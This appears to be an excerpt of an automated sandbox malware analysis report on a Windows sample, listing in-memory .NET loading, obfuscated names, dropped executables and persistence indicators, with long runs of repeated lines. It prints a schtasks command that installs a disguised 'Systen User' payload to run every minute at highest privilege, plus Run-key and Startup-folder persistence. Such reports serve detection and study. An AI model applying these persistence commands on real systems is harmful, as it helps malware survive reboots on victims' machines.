                            Source: adawsfaefasfasfg.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: adawsfaefasfasfg.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: wasdwasfwasfs.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: wasdwasfwasfs.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: wasdwasfwasfs.exe.0.dr, Messages.cs.Net Code: Memory
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 0.2.ozgpPwVAu1.exe.2d3e598.2.raw.unpack, Messages.cs.Net Code: Memory
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 0.2.ozgpPwVAu1.exe.2d24b30.1.raw.unpack, Messages.cs.Net Code: Memory
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: 0.2.ozgpPwVAu1.exe.2d1a0f0.3.raw.unpack, Messages.cs.Net Code: Memory
                            Source: Systen User.2.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: Systen User.2.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: Systen User.2.dr, Messages.cs.Net Code: Memory
                            Source: C:\Users\user\adawsfaefasfasfg.exeCode function: 2_2_00007FF887D28F92 pushad ; ret 2_2_00007FF887D28F93
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF887C2D2A5 pushad ; iretd 8_2_00007FF887C2D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF887D41074 push E85DD1FBh; ret 8_2_00007FF887D410F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF887D410FA push E85DD1FBh; ret 8_2_00007FF887D410F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF887E12316 push 8B485F92h; iretd 8_2_00007FF887E1231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887C2D2A5 pushad ; iretd 9_2_00007FF887C2D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887D41084 push E85DD1FBh; ret 9_2_00007FF887D410F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887D410FA push E85DD1FBh; ret 9_2_00007FF887D410F9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887E12316 push 8B485F92h; iretd 9_2_00007FF887E1231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF887C3D2A5 pushad ; iretd 14_2_00007FF887C3D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FF887E22316 push 8B485F91h; iretd 14_2_00007FF887E2231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF887C2D2A5 pushad ; iretd 16_2_00007FF887C2D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FF887E12316 push 8B485F92h; iretd 16_2_00007FF887E1231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF887C1D2A5 pushad ; iretd 18_2_00007FF887C1D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FF887E02316 push 8B485F93h; iretd 18_2_00007FF887E0231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF887C0D2A5 pushad ; iretd 22_2_00007FF887C0D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FF887DF2316 push 8B485F94h; iretd 22_2_00007FF887DF231B
                            Source: ozgpPwVAu1.exeStatic PE information: section name: .text entropy: 7.927667118084018
                            Source: ozgpPwVAu1.exe, TGZL3mfzzUkOgkHp4g0oyQycwm9mvPij2rxscxy.csHigh entropy of concatenated method names: 'T7Q9uwQ9RPXPf1Z5MM1b6XWnzNpT365mK76lUP7', 'UUZWvCID2xTaCbyiGNTon60A4vU7PTuJMu6QpcD', 'd0nEAb3qZ0cEWXyKBqSLoajQZIwZQ6tz8dvCPWh', 'sWIEVe8IjeQ2HZogn2FE2Cuw5APKLeXdsVq3QoM', 'kAQi1DKS9OLtWCsX7tc7xBUywuEKYbtMjeMz0AY', 'GTloUD7hg51OcnpwG9qqdJ4pkPc1bm3yv1wFOYO', 'Gxw9ACkEwwnCZ2LtpYeMTivyL2UTNJLJ6h5K1Iy', 'Bhbpgj5CBoHmkztnve0OeBeiQxL0yYwXFUDX4Jg', 'AzTm9IvkO7nL49Ooben12Kap4Gx5eMA1CwLilAH', 'IpyUSQTWk3b5EBW1sh2JIXilgnsfqXKJy9gNigd'
                            Source: ozgpPwVAu1.exe, z1OjIvydKGTbalIbYUPcRhi4bOJnRDCAVbUUKYPYD7f49P4ISkbGWdsUqyU2K68zfFPki2ANQvumEvxRMdQvn9SsNNuBub4JA.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_94ZtCFzd0KPbNFkIvRAENYsrVrg533MaRyQqYNB', '_53dEKXjckdCMBFXrjZOyYI4RP05OvfMGhgXIEDm', 'eV5uZbZuL3mtLX6nU9yyohXP3vRNeCf1m6eoLDi', 'NosivGeTY9BA8jUna1w4taRYltRDpSSRqNK1rp8'
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\wasdwasfwasfs.exeJump to dropped file
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile created: C:\Users\user\AppData\Roaming\Systen UserJump to dropped file
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\adawsfaefasfasfg.exeJump to dropped file
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\wasdwasfwasfs.exeJump to dropped file
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\adawsfaefasfasfg.exeJump to dropped file
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile created: C:\Users\user\AppData\Roaming\Systen UserJump to dropped file

                            Boot Survival

                            barindex
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\wasdwasfwasfs.exeJump to dropped file
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeFile created: C:\Users\user\adawsfaefasfasfg.exeJump to dropped file
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Systen User" /tr "C:\Users\user\AppData\Roaming\Systen User"
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnkJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Systen User.lnkJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Systen UserJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Systen UserJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\Desktop\ozgpPwVAu1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\adawsfaefasfasfg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\wasdwasfwasfs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
